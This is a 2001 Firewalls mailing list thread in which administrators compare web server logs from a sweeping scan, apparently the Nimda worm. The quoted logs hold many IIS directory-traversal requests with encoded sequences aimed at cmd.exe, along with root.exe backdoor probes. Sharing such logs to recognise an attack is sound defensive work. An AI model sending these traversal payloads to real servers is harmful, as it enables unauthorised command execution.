RE: something new afoot, sweeping scans:

Paul Wentland Tue, 18 Sep 2001 13:06:19 -0700
Hi,
this one isn't new stuff, see below

http://archives.neohapsis.com/archives/snort/2001-05/0215.html

Paul
-----Original Message-----
From:   Frank Neumann [SMTP:[EMAIL PROTECTED]]
Sent:   Tuesday, September 18, 2001 11:27 AM
To:     Ron DuFresne
Cc:     [EMAIL PROTECTED]
Subject:        Re: something new afoot, sweeping scans:

Hi folks,

Ron DuFresne wrote:

> Folks,
>
> Someone mentioned seeing similiar signatures in their logs earlier today
> to the signatures we are seeing in dramtic rapidity in a short time span.
> Are other sites seeing similiar signatures <quick greps attached and
> posted below>  Has a new toy been unleshed, or is this an old toy we have
> not seen the signature for before:

I found similar log entries in one of my web servers dating from May(see 
excerpt from log). But this were only a few scans. Starting today I 
recognize at least as many
hits as we had with Code Red. So it doesn't seem to be an new 
virus/worm/whatever.

[23/May/2001:00:55:07 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 305

Regards,
Frank

> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn  
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn  
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%c1%9c..  
/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET /scripts/..%252f../  
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn  
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
RE: something new afoot, sweeping scans:

Reply via email to
